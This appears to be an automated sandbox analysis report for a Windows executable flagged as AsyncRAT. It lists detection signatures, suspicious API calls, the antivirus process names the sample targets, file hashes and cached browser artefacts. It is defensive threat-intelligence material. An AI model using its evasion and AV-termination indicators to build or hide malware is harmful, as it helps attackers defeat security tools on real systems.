Source: 0pF5Vz4xG4.exe, DInvokeCore.cs	Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: 0pF5Vz4xG4.exe, AntiProcess.cs	Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR

AV process strings found (often used to terminate AV products)

Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: MSASCui.exe
Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: procexp.exe
Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: MsMpEng.exe

ID:	1447642
Product:	CloudBasic
Start time:	09:46:09
Start date:	26.05.2024
Sample:	0pF5Vz4xG4.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	769a1873247d5024808cf7bd70555b01
SHA1:	2e55be1191affa933438890fc34eb31136bef045
SHA256:	850932bf796d17da05dc8c531993db6423b56686ff7dc68cc0a802e87f827fad
Filetype:	Win64 Executable GUI Net Framework (217006/5) 49.88%

Name	Type	MD5	SHA1	SHA256
Chrome Cache Entry: 100	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced	522037F008E03C9448AE0AAAF09E93CB	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
Chrome Cache Entry: 101	ASCII text, with very long lines (46318), with CRLF line terminators	64FEC8C9709417DC2B86A5819DBB1E52	471D34DAAD285043024930C4B398944D6D1327F7	CE1FB3040E2B84B9EB62E10F25EB7E08E3CE6FD3551D5FBF41F9921328F7AEAD
Chrome Cache Entry: 102	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced	F6EC97C43480D41695065AD55A97B382	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
Chrome Cache Entry: 103	JSON data	EF6E83E1C6E863A122281F71DD8020B4	CEA054B197D99548088012C2E011F3BA5DB8CE60	B22DAC9B489D9184B1FFE6A4981CAE6C350557D2E7B3378FED8B2A20D41DEB70
Chrome Cache Entry: 104	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1300x300, components 3	AFAFE698D929207CC1A4E13E7BD71AEC	89FCC2601AA41B2A455A9CF6972A84A7D370D958	C5B63D48EBEB0E175339AAD5371E3BF4508CCD65DBC344F72B0688AD6AA94F9A
Chrome Cache Entry: 105	ASCII text, with very long lines (65409)	B6C6F82EAC50F30FFCC090FA845F53F0	1B84A3B53A340BA59171800DF683D15418DD09D3	7D960385011DDFE6CC859E56D4302DEDA71FDB2D90655E907C14E77D2DCBC8A5
Chrome Cache Entry: 106	JSON data	AFDB442DA3E373624C3A37B99691D70B	4AFAD03FBCD14E676295121C611361230DA0A0FA	1BB71C94A1B180EFC9509113BE970ADF4F1229BA73CC6507758E0A350B905C36
Chrome Cache Entry: 107	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced	240C4CC15D9FD65405BB642AB81BE615	5A66783FE5DD932082F40811AE0769526874BFD3	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
Chrome Cache Entry: 71	ASCII text, with CRLF line terminators	020629EBA820F2E09D8CDA1A753C032B	D91A65036E4C36B07AE3641E32F23F8DD616BD17	F8AE8A1DC7CE7877B9FB9299183D2EBB3BEFAD0B6489AE785D99047EC2EB92D1
Chrome Cache Entry: 72	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced	512625CF8F40021445D74253DC7C28C0	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
Chrome Cache Entry: 73	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced	240C4CC15D9FD65405BB642AB81BE615	5A66783FE5DD932082F40811AE0769526874BFD3	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
Chrome Cache Entry: 74	SVG Scalable Vector Graphics image	37258A983459AE1C2E4F1E551665F388	603A4E9115E613CC827206CF792C62AEB606C941	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
Chrome Cache Entry: 75	JSON data	AFDB442DA3E373624C3A37B99691D70B	4AFAD03FBCD14E676295121C611361230DA0A0FA	1BB71C94A1B180EFC9509113BE970ADF4F1229BA73CC6507758E0A350B905C36
Chrome Cache Entry: 76	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced	3062488F9D119C0D79448BE06ED140D8	8A148951C894FC9E968D3E46589A2E978267650E	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
Chrome Cache Entry: 77	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1300x300, components 3	AFAFE698D929207CC1A4E13E7BD71AEC	89FCC2601AA41B2A455A9CF6972A84A7D370D958	C5B63D48EBEB0E175339AAD5371E3BF4508CCD65DBC344F72B0688AD6AA94F9A
Chrome Cache Entry: 78	JSON data	93620C67163BA97273990BFCFE150F7D	890B073B2660106A581D976B3BAD22248454F978	BE717436CB691B9DA123AD943077A055F98FFC080A41964197EFA4A1308F95F8
Chrome Cache Entry: 79	JSON data	93620C67163BA97273990BFCFE150F7D	890B073B2660106A581D976B3BAD22248454F978	BE717436CB691B9DA123AD943077A055F98FFC080A41964197EFA4A1308F95F8
Chrome Cache Entry: 80	Web Open Font Format (Version 2), TrueType, length 18768, version 1.0	870B357C3BAE1178740236D64790E444	5FA06435D0ECF28CBD005773F8C335C44D7DF522	0227BD6A0408946E9B4DF6F1A340E3713759A42A7677BDB8CB34698E4EDF541E
Chrome Cache Entry: 81	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced	3062488F9D119C0D79448BE06ED140D8	8A148951C894FC9E968D3E46589A2E978267650E	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
Chrome Cache Entry: 82	ASCII text, with very long lines (52717), with no line terminators	413FCC759CC19821B61B6941808B29B5	1AD23B8A202043539C20681B1B3E9F3BC5D55133	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
Chrome Cache Entry: 83	exported SGML document, ASCII text, with very long lines (65536), with no line terminators	2E00D51C98DBB338E81054F240E1DEB2	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
Chrome Cache Entry: 84	ASCII text, with no line terminators	0B04EA412F8FC88B51398B1CBF38110E	E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF	7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
Chrome Cache Entry: 85	HTML document, ASCII text, with very long lines (516), with CRLF, LF line terminators	A653431D50ECDEAC91593EBD8247DE59	4825FECE36AE7CA043FC41F126BAC351C29C9FC9	6EC4B57ABB2AAD2052167799B62E3A2AC1201172832A3C3F892C16EBA81C9B8B
Chrome Cache Entry: 86	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced	512625CF8F40021445D74253DC7C28C0	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
Chrome Cache Entry: 87	JSON data	9E576E34B18E986347909C29AE6A82C6	532C767978DC2B55854B3CA2D2DF5B4DB221C934	88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
Chrome Cache Entry: 88	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors	12E3DAC858061D088023B2BD48E2FA96	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
Chrome Cache Entry: 89	JSON data	F42D394130C9AE372121C3758F7E266C	E36A7E780DF38D21BF955099234684147D88A857	5D785C46FC1C27EB4A0862D554BD5CBCDA0847B9130E941FABD811F1BE3543CE
Chrome Cache Entry: 90	ASCII text, with very long lines (65536), with no line terminators	5B7A5BD2B298466186ABFFDCB6375E1A	2BD0A1D36029DFB9E1BB52BFE6A4EBCC6A8C7B63	D4C3121D2107CADE7CA90DF33D46F96AF00CB8A83F9CAE0DF53E167783C6B682
Chrome Cache Entry: 91	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors	12E3DAC858061D088023B2BD48E2FA96	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
Chrome Cache Entry: 92	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced	F6EC97C43480D41695065AD55A97B382	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
Chrome Cache Entry: 93	ASCII text, with very long lines (31813), with no line terminators	A3A99B2F3322FD0124BAD7705F694A96	30A0FB299B76B63DE0E908F1ABF300A28217ED78	70673549B8377A7BB5E3CB9413521C16C4E0B5F7BD469A783F78FF423E6BC187
Chrome Cache Entry: 94	JSON data	F42D394130C9AE372121C3758F7E266C	E36A7E780DF38D21BF955099234684147D88A857	5D785C46FC1C27EB4A0862D554BD5CBCDA0847B9130E941FABD811F1BE3543CE
Chrome Cache Entry: 95	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced	522037F008E03C9448AE0AAAF09E93CB	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
Chrome Cache Entry: 96	JSON data	EF6E83E1C6E863A122281F71DD8020B4	CEA054B197D99548088012C2E011F3BA5DB8CE60	B22DAC9B489D9184B1FFE6A4981CAE6C350557D2E7B3378FED8B2A20D41DEB70
Chrome Cache Entry: 97	JSON data	9E576E34B18E986347909C29AE6A82C6	532C767978DC2B55854B3CA2D2DF5B4DB221C934	88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
Chrome Cache Entry: 98	SVG Scalable Vector Graphics image	37258A983459AE1C2E4F1E551665F388	603A4E9115E613CC827206CF792C62AEB606C941	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
Chrome Cache Entry: 99	ASCII text, with very long lines (31813), with no line terminators	A3A99B2F3322FD0124BAD7705F694A96	30A0FB299B76B63DE0E908F1ABF300A28217ED78	70673549B8377A7BB5E3CB9413521C16C4E0B5F7BD469A783F78FF423E6BC187

Windows Analysis Report
0pF5Vz4xG4.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Phishing

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Lowering of HIPS / PFW / Operating System Security Settings

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report 0pF5Vz4xG4.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Phishing

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Lowering of HIPS / PFW / Operating System Security Settings

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
0pF5Vz4xG4.exe

Malware Threat Intel
Provided by